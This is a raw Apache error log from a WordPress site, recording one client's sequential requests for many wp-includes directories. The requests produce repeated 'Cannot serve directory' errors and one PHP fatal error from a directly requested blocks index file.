[client 91.92.242.136:48194] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:22.574821 2023] [autoindex:error] [pid 2572:tid 140480620701440] [client 91.92.242.136:48204] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:27.131266 2023] [autoindex:error] [pid 2441:tid 140480612308736] [client 91.92.242.136:48208] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:33.044677 2023] [autoindex:error] [pid 2441:tid 140480879892224] [client 91.92.242.136:48212] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:38.960967 2023] [autoindex:error] [pid 2572:tid 140480721413888] [client 91.92.242.136:48216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:49.695871 2023] [:error] [pid 2572:tid 140480780162816] [client 91.92.242.136:48220] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Nov 05 15:59:49.696076 2023] [:error] [pid 2572:tid 140480780162816] [client 91.92.242.136:48220] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Nov 05 15:59:49.696243 2023] [:error] [pid 2572:tid 140480780162816] [client 91.92.242.136:48220] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Nov 05 15:59:49.696390 2023] [:error] [pid 2572:tid 140480780162816] [client 91.92.242.136:48220] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Nov 05 15:59:54.457373 2023] [autoindex:error] [pid 2442:tid 140480620701440] [client 91.92.242.136:48228] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/archives/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:57.950290 2023] [autoindex:error] [pid 2441:tid 140480788555520] [client 91.92.242.136:48232] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:07.534980 2023] [autoindex:error] [pid 2442:tid 140480671057664] [client 91.92.242.136:48242] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/block/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:10.787715 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:48256] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:14.752426 2023] [autoindex:error] [pid 2441:tid 140480763377408] [client 91.92.242.136:48260] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:19.813419 2023] [autoindex:error] [pid 2442:tid 140480888284928] [client 91.92.242.136:48264] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/calendar/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:25.703329 2023] [autoindex:error] [pid 2442:tid 140480746592000] [client 91.92.242.136:48268] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/categories/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:28.334260 2023] [autoindex:error] [pid 2572:tid 140480796948224] [client 91.92.242.136:48272] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/code/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:35.399362 2023] [autoindex:error] [pid 2441:tid 140480704628480] [client 91.92.242.136:48276] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/column/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:00:51.870647 2023] [autoindex:error] [pid 2441:tid 140480654272256] [client 91.92.242.136:48280] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/columns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:01:00.983447 2023] [autoindex:error] [pid 2441:tid 140480687843072] [client 91.92.242.136:48288] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/cover/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:01:07.661934 2023] [autoindex:error] [pid 2441:tid 140480696235776] [client 91.92.242.136:48296] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/embed/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:01:13.900678 2023] [autoindex:error] [pid 2442:tid 140480763377408] [client 91.92.242.136:48306] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:01:26.325394 2023] [autoindex:error] [pid 2441:tid 140480637486848] [client 91.92.242.136:48312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/freeform/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:01:30.048421 2023] [autoindex:error] [pid 2441:tid 140480746592000] [client 91.92.242.136:48316] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/gallery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:01:39.467634 2023] [autoindex:error] [pid 2442:tid 140480696235776] [client 91.92.242.136:48320] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/group/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:02.111876 2023] [autoindex:error] [pid 2442:tid 140480645879552] [client 91.92.242.136:48344] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/heading/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:13.943840 2023] [autoindex:error] [pid 2572:tid 140480713021184] [client 91.92.242.136:48362] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/html/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:17.419013 2023] [autoindex:error] [pid 2572:tid 140480721413888] [client 91.92.242.136:48366] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:23.676707 2023] [autoindex:error] [pid 2572:tid 140480671057664] [client 91.92.242.136:48370] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-comments/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:34.178718 2023] [autoindex:error] [pid 2441:tid 140480780162816] [client 91.92.242.136:48374] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-posts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:39.240291 2023] [autoindex:error] [pid 2441:tid 140480721413888] [client 91.92.242.136:48378] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/legacy-widget/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:02:50.455672 2023] [autoindex:error] [pid 2442:tid 140480629094144] [client 91.92.242.136:48384] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/list/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:09.855420 2023] [autoindex:error] [pid 2442:tid 140480612308736] [client 91.92.242.136:48402] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/loginout/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:15.758733 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:48406] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/media-text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:23.984591 2023] [autoindex:error] [pid 2442:tid 140480754984704] [client 91.92.242.136:48410] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/missing/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:27.518611 2023] [autoindex:error] [pid 2442:tid 140480763377408] [client 91.92.242.136:48414] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/more/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:34.920345 2023] [autoindex:error] [pid 2443:tid 140480746592000] [client 91.92.242.136:48418] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/nextpage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:37.749789 2023] [autoindex:error] [pid 2572:tid 140480687843072] [client 91.92.242.136:48422] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/page-list/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:43.263139 2023] [autoindex:error] [pid 2442:tid 140480696235776] [client 91.92.242.136:48426] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:03:50.398406 2023] [autoindex:error] [pid 2442:tid 140480679450368] [client 91.92.242.136:48434] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:02.486705 2023] [autoindex:error] [pid 2442:tid 140480620701440] [client 91.92.242.136:48450] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-date/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:09.574278 2023] [autoindex:error] [pid 2572:tid 140480637486848] [client 91.92.242.136:48456] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-excerpt/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:14.716876 2023] [autoindex:error] [pid 2572:tid 140480696235776] [client 91.92.242.136:48462] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-featured-image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:20.580458 2023] [autoindex:error] [pid 2442:tid 140480780162816] [client 91.92.242.136:48484] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-template/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:24.030411 2023] [autoindex:error] [pid 2572:tid 140480713021184] [client 91.92.242.136:48488] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-terms/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:30.554896 2023] [autoindex:error] [pid 2441:tid 140480662664960] [client 91.92.242.136:48492] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:38.005951 2023] [autoindex:error] [pid 2572:tid 140480721413888] [client 91.92.242.136:48496] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/preformatted/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:49.403704 2023] [autoindex:error] [pid 2441:tid 140480629094144] [client 91.92.242.136:48508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:04:53.815575 2023] [autoindex:error] [pid 2442:tid 140480738199296] [client 91.92.242.136:48516] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-next/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:01.196111 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:48520] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-numbers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:05.526208 2023] [autoindex:error] [pid 2443:tid 140480662664960] [client 91.92.242.136:48526] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-previous/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:12.670780 2023] [autoindex:error] [pid 2441:tid 140480612308736] [client 91.92.242.136:48530] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:21.281513 2023] [autoindex:error] [pid 2441:tid 140480771770112] [client 91.92.242.136:48540] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:25.629195 2023] [autoindex:error] [pid 2441:tid 140480763377408] [client 91.92.242.136:48544] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:30.656893 2023] [autoindex:error] [pid 2442:tid 140480687843072] [client 91.92.242.136:48548] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/quote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:47.673122 2023] [autoindex:error] [pid 2572:tid 140480620701440] [client 91.92.242.136:48552] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/rss/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:50.372556 2023] [autoindex:error] [pid 2442:tid 140480721413888] [client 91.92.242.136:48556] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:05:57.357807 2023] [autoindex:error] [pid 2572:tid 140480780162816] [client 91.92.242.136:48564] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/separator/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:02.713210 2023] [autoindex:error] [pid 2442:tid 140480645879552] [client 91.92.242.136:48568] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/shortcode/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:09.226972 2023] [autoindex:error] [pid 2443:tid 140480637486848] [client 91.92.242.136:48572] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-logo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:16.075344 2023] [autoindex:error] [pid 2572:tid 140480637486848] [client 91.92.242.136:48578] 